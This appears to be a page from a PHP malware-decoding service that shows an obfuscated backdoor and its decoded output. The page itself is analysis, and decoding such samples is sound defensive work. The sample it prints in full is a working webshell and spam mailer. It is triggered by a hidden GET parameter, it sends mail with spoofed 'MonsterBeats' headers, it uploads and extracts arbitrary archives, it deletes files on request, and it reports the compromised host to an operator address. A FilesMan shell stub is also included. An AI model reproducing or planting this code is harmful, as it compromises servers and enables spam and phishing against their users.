Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if(isset($_GET["t2479n"])){ eval(base64_decode("ZGVmaW5lKCJERUZDQUxMQkFDS01BS..
Decoded Output download
define("DEFCALLBACKMAIL", $_POST['from']);
$tomail = $_POST['to'];
$subj = $_POST['subject'];
$file = $_POST['att'];
$cmd = $_POST['cmd'];
$arch_file = $_POST['arch_file'];
$etest_mail = '[email protected]';
$dir = dirname(__FILE__)."/";
$html = file_get_contents($dir.$file);
$final_msg = preparehtmlmail($html,$dir);
if($cmd == 'mail'){
print_r($arch_file);
if (@fopen($file, "r")) {
if (mail($tomail, $subj, $final_msg['multipart'], $final_msg['headers'])) {
echo "Ok";
return true;
}else{
echo "MTA error!";
return false;
}
}else{
print_r($arch_file);
echo "test";
throw new Exception("Template exist!");
}
}elseif ($cmd == 'unzip' && !empty($arch_file)){
$zip = new ZipArchive;
$res = $zip->open($arch_file);
if ($res === TRUE) {
$zip->extractTo('./');
$zip->close();
echo 'ok';
} else {
echo 'failed';
}
}elseif($cmd == 'flUpl'){
$uploaddir = realpath('./') . '/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
echo '<pre>';
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
$zip = new ZipArchive;
$res = $zip->open($_FILES['userfile']['name']);
echo "--------------".$_SERVER['SERVER_NAME']."--------------<br>";
echo "File is valid, and was successfully uploaded.
";
if ($res === TRUE) {
$zip->extractTo('./');
$zip->close();
echo '<br>and Unpacked<br>';
} else {
echo $_FILES['userfile']['error'];
echo '<br>unpack failed<br>';
}
} else {
echo "Possible file upload attack!
";
}
}else{
echo "PHP Mail Socket v.: 0.92<br><br>";
if (!extension_loaded('zip')) {
echo '<small><FONT style="BACKGROUND-COLOR:#FF0000">ZIP module is exist!!! Upload you your template manualy.</FONT></small><br><br>';
}else{
echo '<small><FONT style="BACKGROUND-COLOR:#00FF00">ZIP module is loaded.</FONT></small><br><br>';
}
}
if($_GET['cmd'] == 'unlink' && !empty($_GET['file'])){
unlink($_GET['file']);
echo "Removed: ".$_GET['file'];
}
if($_GET['cmd'] == 'phpinfo'){
phpinfo();
}
if($_GET['cmd'] == 'etest'){
$url = $_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];
$url = explode('?', $url);
$url = str_replace(".", " ", $url['0']);
if(mail($etest_mail, 'Shell test check', '_'.$url.' - Ok')) {
echo "<b>Ok<b>";
return true;
}else{
echo "</b>MTA error!</b>";
return false;
}
}
function preparehtmlmail($html,$dir) {
preg_match_all('~<img.*?src=.([\/.a-z0-9:_-]+).*?>~si',$html,$matches);
$i = 0;
$paths = array();
foreach ($matches[1] as $img) {
$img_old = $img;
if(strpos($img, "http://") == false) {
$uri = parse_url($img);
$paths[$i]['path'] = $dir.$uri['path'];
$content_id = md5($img);
$html = str_replace($img_old,'cid:'.$content_id,$html);
$paths[$i++]['cid'] = $content_id;
}
}
$boundary = "--".md5(uniqid(time()));
$headers = "MIME-Version: 1.0
";
$headers .="Content-Type: multipart/mixed; boundary=\"$boundary\"
";
$headers .= "Reply-To: MonsterBeats <".DEFCALLBACKMAIL.">
";
$headers .= "Return-Path: MonsterBeats <".DEFCALLBACKMAIL.">
";
$headers .= "Organization: MonsterBeats
";
$headers .= "From: ".DEFCALLBACKMAIL."
";
$multipart = '';
$multipart .= "--$boundary
";
$kod = 'utf-8';
$multipart .= "Content-Type: text/html; charset=$kod
";
$multipart .= "Content-Transfer-Encoding: Quot-Printed
";
$multipart .= "$html
";
foreach ($paths as $path) {
if(file_exists($path['path']))
$fp = fopen($path['path'],"r");
if (!$fp) {
echo "File cannot be loaded";
return false;
}
$imagetype = substr(strrchr($path['path'], '.' ),1);
$file = fread($fp, filesize($path['path']));
fclose($fp);
$message_part = "";
switch ($imagetype) {
case 'png':
case 'PNG':
$message_part .= "Content-Type: image/png";
break;
case 'jpg':
case 'jpeg':
case 'JPG':
case 'JPEG':
$message_part .= "Content-Type: image/jpeg";
break;
case 'gif':
case 'GIF':
$message_part .= "Content-Type: image/gif";
break;
}
$message_part .= "; file_name = ".$path['path']. "
";
$message_part .= "Content-ID: <" . $path['cid'] . ">
";
$message_part .= "Content-Transfer-Encoding: base64
";
$message_part .= "Content-Disposition: inline; filename = \"" . basename($path['path']) . "\"
";
$message_part .= chunk_split(base64_encode($file))."
";
$multipart .= "--$boundary
".$message_part."
";
}
$multipart .= "--$boundary--
";
return array('multipart' => $multipart, 'headers' => $headers);
}
Did this file decode correctly?
Original Code
<?php if(isset($_GET["t2479n"])){ eval(base64_decode("ZGVmaW5lKCJERUZDQUxMQkFDS01BSUwiLCAkX1BPU1RbJ2Zyb20nXSk7CiR0b21haWwgPSAkX1BPU1RbJ3RvJ107CiRzdWJqID0gJF9QT1NUWydzdWJqZWN0J107CiRmaWxlID0gJF9QT1NUWydhdHQnXTsKJGNtZCA9ICRfUE9TVFsnY21kJ107CiRhcmNoX2ZpbGUgPSAkX1BPU1RbJ2FyY2hfZmlsZSddOwokZXRlc3RfbWFpbCA9ICdjb211YTlAZ21haWwuY29tJzsKCgokZGlyID0gZGlybmFtZShfX0ZJTEVfXykuIi8iOwoKJGh0bWwgPSBmaWxlX2dldF9jb250ZW50cygkZGlyLiRmaWxlKTsKJGZpbmFsX21zZyA9IHByZXBhcmVodG1sbWFpbCgkaHRtbCwkZGlyKTsKCmlmKCRjbWQgPT0gJ21haWwnKXsKCXByaW50X3IoJGFyY2hfZmlsZSk7IAoJaWYgKEBmb3BlbigkZmlsZSwgInIiKSkgewoJCWlmIChtYWlsKCR0b21haWwsICRzdWJqLCAkZmluYWxfbXNnWydtdWx0aXBhcnQnXSwgJGZpbmFsX21zZ1snaGVhZGVycyddKSkgewoJCQllY2hvICJPayI7CgkJCXJldHVybiB0cnVlOwoJCX1lbHNlewoJCQllY2hvICJNVEEgZXJyb3IhIjsKCQkJcmV0dXJuIGZhbHNlOwoJCX0KCX1lbHNlewoJCXByaW50X3IoJGFyY2hfZmlsZSk7CgkJZWNobyAidGVzdCI7CgkJdGhyb3cgbmV3IEV4Y2VwdGlvbigiVGVtcGxhdGUgZXhpc3QhIik7Cgl9Cn1lbHNlaWYgKCRjbWQgPT0gJ3VuemlwJyAmJiAhZW1wdHkoJGFyY2hfZmlsZSkpewoJJHppcCA9IG5ldyBaaXBBcmNoaXZlOwoJJHJlcyA9ICR6aXAtPm9wZW4oJGFyY2hfZmlsZSk7CglpZiAoJHJlcyA9PT0gVFJVRSkgewoJCSR6aXAtPmV4dHJhY3RUbygnLi8nKTsKCQkkemlwLT5jbG9zZSgpOwoJCWVjaG8gJ29rJzsKCX0gZWxzZSB7CgkJZWNobyAnZmFpbGVkJzsKCX0KfWVsc2VpZigkY21kID09ICdmbFVwbCcpewoJJHVwbG9hZGRpciA9IHJlYWxwYXRoKCcuLycpIC4gJy8nOwoJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gYmFzZW5hbWUoJF9GSUxFU1sndXNlcmZpbGUnXVsnbmFtZSddKTsKCWVjaG8gJzxwcmU+JzsKCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1sndXNlcmZpbGUnXVsndG1wX25hbWUnXSwgJHVwbG9hZGZpbGUpKSB7CgkJJHppcCA9IG5ldyBaaXBBcmNoaXZlOwoJCSRyZXMgPSAkemlwLT5vcGVuKCRfRklMRVNbJ3VzZXJmaWxlJ11bJ25hbWUnXSk7CgkJZWNobyAiLS0tLS0tLS0tLS0tLS0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiItLS0tLS0tLS0tLS0tLTxicj4iOwoJCWVjaG8gIkZpbGUgaXMgdmFsaWQsIGFuZCB3YXMgc3VjY2Vzc2Z1bGx5IHVwbG9hZGVkLlxuIjsKCQlpZiAoJHJlcyA9PT0gVFJVRSkgewoJCQkkemlwLT5leHRyYWN0VG8oJy4vJyk7CgkJCSR6aXAtPmNsb3NlKCk7CgkJCWVjaG8gJzxicj5hbmQgVW5wYWNrZWQ8YnI+JzsKCQl9IGVsc2UgewoJCQllY2hvICRfRklMRVNbJ3VzZXJmaWxlJ11bJ2Vycm9yJ107CgkJCWVjaG8gJzxicj51bnBhY2sgZmFpbGVkPGJyPic7CgkJfQoJfSBlbHNlIHsKCQllY2hvICJQb3NzaWJsZSBmaWxlIHVwbG9hZCBhdHRhY2shXG4iOwoJfQp9ZWxzZXsKCWVjaG8gIlBIUCBNYWlsIFNvY2tldCB2LjogMC45Mjxicj48YnI+IjsKCWlmICghZXh0ZW5zaW9uX2xvYWRlZCgnemlwJykpIHsKCQllY2hvICc8c21hbGw+PEZPTlQgc3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6I0ZGMDAwMCI+WklQIG1vZHVsZSBpcyBleGlzdCEhISBVcGxvYWQgeW91IHlvdXIgdGVtcGxhdGUgbWFudWFseS48L0ZPTlQ+PC9zbWFsbD48YnI+PGJyPic7Cgl9ZWxzZXsKCQllY2hvICc8c21hbGw+PEZPTlQgc3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6IzAwRkYwMCI+WklQIG1vZHVsZSBpcyBsb2FkZWQuPC9GT05UPjwvc21hbGw+PGJyPjxicj4nOwoJfQp9CgppZigkX0dFVFsnY21kJ10gPT0gJ3VubGluaycgJiYgIWVtcHR5KCRfR0VUWydmaWxlJ10pKXsKCXVubGluaygkX0dFVFsnZmlsZSddKTsKCWVjaG8gIlJlbW92ZWQ6ICIuJF9HRVRbJ2ZpbGUnXTsKfQppZigkX0dFVFsnY21kJ10gPT0gJ3BocGluZm8nKXsKCXBocGluZm8oKTsKfQoKaWYoJF9HRVRbJ2NtZCddID09ICdldGVzdCcpewoJJHVybCA9ICRfU0VSVkVSW0hUVFBfSE9TVF0uJF9TRVJWRVJbUkVRVUVTVF9VUkldOwoJJHVybCA9IGV4cGxvZGUoJz8nLCAkdXJsKTsKCSR1cmwgPSBzdHJfcmVwbGFjZSgiLiIsICIgIiwgJHVybFsnMCddKTsKCWlmKG1haWwoJGV0ZXN0X21haWwsICdTaGVsbCB0ZXN0IGNoZWNrJywgJ18nLiR1cmwuJyAtIE9rJykpIHsKCQllY2hvICI8Yj5PazxiPiI7CgkJcmV0dXJuIHRydWU7Cgl9ZWxzZXsKCQllY2hvICI8L2I+TVRBIGVycm9yITwvYj4iOwoJCXJldHVybiBmYWxzZTsKCX0KfQoKZnVuY3Rpb24gcHJlcGFyZWh0bWxtYWlsKCRodG1sLCRkaXIpIHsKCglwcmVnX21hdGNoX2FsbCgnfjxpbWcuKj9zcmM9LihbXC8uYS16MC05Ol8tXSspLio/Pn5zaScsJGh0bWwsJG1hdGNoZXMpOwoJJGkgPSAwOwoJJHBhdGhzID0gYXJyYXkoKTsKCWZvcmVhY2ggKCRtYXRjaGVzWzFdIGFzICRpbWcpIHsKCQkkaW1nX29sZCA9ICRpbWc7CgoJCWlmKHN0cnBvcygkaW1nLCAiaHR0cDovLyIpID09IGZhbHNlKSB7CgkJCSR1cmkgPSBwYXJzZV91cmwoJGltZyk7CgkJCSRwYXRoc1skaV1bJ3BhdGgnXSA9ICRkaXIuJHVyaVsncGF0aCddOwoJCQkkY29udGVudF9pZCA9IG1kNSgkaW1nKTsKCQkJJGh0bWwgPSBzdHJfcmVwbGFjZSgkaW1nX29sZCwnY2lkOicuJGNvbnRlbnRfaWQsJGh0bWwpOwoJCQkkcGF0aHNbJGkrK11bJ2NpZCddID0gJGNvbnRlbnRfaWQ7CgkJfQoJfQoKCSRib3VuZGFyeSA9ICItLSIubWQ1KHVuaXFpZCh0aW1lKCkpKTsKCSRoZWFkZXJzID0gIk1JTUUtVmVyc2lvbjogMS4wXG4iOwoJJGhlYWRlcnMgLj0iQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvbWl4ZWQ7IGJvdW5kYXJ5PVwiJGJvdW5kYXJ5XCJcbiI7CgoJJGhlYWRlcnMgLj0gIlJlcGx5LVRvOiBNb25zdGVyQmVhdHMgPCIuREVGQ0FMTEJBQ0tNQUlMLiI+XHJcbiI7CgkkaGVhZGVycyAuPSAiUmV0dXJuLVBhdGg6IE1vbnN0ZXJCZWF0cyA8Ii5ERUZDQUxMQkFDS01BSUwuIj5cclxuIjsKCSRoZWFkZXJzIC49ICJPcmdhbml6YXRpb246IE1vbnN0ZXJCZWF0c1xyXG4iOwoKCSRoZWFkZXJzIC49ICJGcm9tOiAiLkRFRkNBTExCQUNLTUFJTC4iXHJcbiI7CgkkbXVsdGlwYXJ0ID0gJyc7CgkkbXVsdGlwYXJ0IC49ICItLSRib3VuZGFyeVxuIjsKCSRrb2QgPSAndXRmLTgnOwoJJG11bHRpcGFydCAuPSAiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9JGtvZFxuIjsKCSRtdWx0aXBhcnQgLj0gIkNvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6IFF1b3QtUHJpbnRlZFxuXG4iOwoJJG11bHRpcGFydCAuPSAiJGh0bWxcblxuIjsKCglmb3JlYWNoICgkcGF0aHMgYXMgJHBhdGgpIHsKCQlpZihmaWxlX2V4aXN0cygkcGF0aFsncGF0aCddKSkKCQkJJGZwID0gZm9wZW4oJHBhdGhbJ3BhdGgnXSwiciIpOwoJCWlmICghJGZwKSAgewoJCQllY2hvICJGaWxlIGNhbm5vdCBiZSBsb2FkZWQiOwoJCQlyZXR1cm4gZmFsc2U7CgkJfQoKCQkkaW1hZ2V0eXBlID0gc3Vic3RyKHN0cnJjaHIoJHBhdGhbJ3BhdGgnXSwgJy4nICksMSk7CgkJJGZpbGUgPSBmcmVhZCgkZnAsIGZpbGVzaXplKCRwYXRoWydwYXRoJ10pKTsKCQlmY2xvc2UoJGZwKTsKCgkJJG1lc3NhZ2VfcGFydCA9ICIiOwoKCQlzd2l0Y2ggKCRpbWFnZXR5cGUpIHsKCQkJY2FzZSAncG5nJzoKCQkJY2FzZSAnUE5HJzoKCQkJCSRtZXNzYWdlX3BhcnQgLj0gIkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nIjsKCQkJCWJyZWFrOwoJCQljYXNlICdqcGcnOgoJCQljYXNlICdqcGVnJzoKCQkJY2FzZSAnSlBHJzoKCQkJY2FzZSAnSlBFRyc6CgkJCQkkbWVzc2FnZV9wYXJ0IC49ICJDb250ZW50LVR5cGU6IGltYWdlL2pwZWciOwoJCQkJYnJlYWs7CgkJCWNhc2UgJ2dpZic6CgkJCWNhc2UgJ0dJRic6CgkJCQkkbWVzc2FnZV9wYXJ0IC49ICJDb250ZW50LVR5cGU6IGltYWdlL2dpZiI7CgkJCQlicmVhazsKCQl9CgkJJG1lc3NhZ2VfcGFydCAuPSAiOyBmaWxlX25hbWUgPSAiLiRwYXRoWydwYXRoJ10uICJcbiI7CgkJJG1lc3NhZ2VfcGFydCAuPSAiQ29udGVudC1JRDogPCIgLiAkcGF0aFsnY2lkJ10gLiAiPlxuIjsKCQkkbWVzc2FnZV9wYXJ0IC49ICJDb250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiBiYXNlNjRcbiI7CgkJJG1lc3NhZ2VfcGFydCAuPSAiQ29udGVudC1EaXNwb3NpdGlvbjogaW5saW5lOyBmaWxlbmFtZSA9IFwiIiAuIGJhc2VuYW1lKCRwYXRoWydwYXRoJ10pIC4gIlwiXG5cbiI7CgkJJG1lc3NhZ2VfcGFydCAuPSBjaHVua19zcGxpdChiYXNlNjRfZW5jb2RlKCRmaWxlKSkuIlxuIjsKCQkkbXVsdGlwYXJ0IC49ICItLSRib3VuZGFyeVxuIi4kbWVzc2FnZV9wYXJ0LiJcbiI7CgoJfQoKCSRtdWx0aXBhcnQgLj0gIi0tJGJvdW5kYXJ5LS1cbiI7CglyZXR1cm4gYXJyYXkoJ211bHRpcGFydCcgPT4gJG11bHRpcGFydCwgJ2hlYWRlcnMnID0+ICRoZWFkZXJzKTsKfQ==")); exit; } ?><?php if(isset($_GET["t6699n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251"; exit; } ?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 2762c634b896bc4d53676a36fdddad02 |
Eval Count | 1 |
Decode Time | 133 ms |